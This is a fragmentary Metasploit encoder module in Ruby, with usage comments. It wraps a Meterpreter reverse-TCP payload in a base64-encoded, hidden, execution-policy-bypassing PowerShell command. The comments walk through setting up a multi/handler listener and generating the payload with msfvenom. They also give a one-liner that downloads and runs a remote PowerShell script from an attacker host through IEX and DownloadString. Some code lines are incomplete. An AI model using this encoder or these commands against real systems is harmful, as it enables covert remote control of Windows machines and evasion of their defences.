# copy base64.rb to metasploit-framework/embedded/framework/modules/encoders/powershell.If powershell is empty,mkdir powershell.
# msf encoder(powershell/base64) > use exploit/multi/handler
# msf exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
# payload => windows/x64/meterpreter/reverse_tcp
# msf exploit(multi/handler) > exploit
# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=xx -f psh-reflection --arch x64 --platform windows | msfvenom -e powershell/base64 --arch x64 --platform windows.
# [*] Started reverse TCP handler on xx.1xx.xx.xx:xx
class MetasploitModule < Msf::Encoder
'Name' => 'Powershell Base64 Encoder',
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=xx
-f psh-reflection --arch x64 --platform windows | msfvenom -e
powershell/base64 --arch x64 --platform windows.
OptBool.new('payload', [ false, 'Use payload ', false ]),
OptBool.new('x64',[ false, 'Use syswow64 powershell', false ])
def encode_block(state, buf)
base64 = Rex::Text.encode_base64(Rex::Text.to_unicode(buf))
cmd += 'c:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe '
cmd += '-windowstyle hidden -exec bypass -NoExit '
cmd += "-EncodedCommand \#{base64}"
# execute echo powershell -windowstyle hidden -exec bypass -c \""IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.117/xxx.ps1');\""|msfvenom -e x64/xor4 --arch x64 --platform windows
# xxx.ps1 is msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=xx -f psh-reflection --arch x64 --platform windows | msfvenom -e powershell/base64 --arch x64 --platform windows.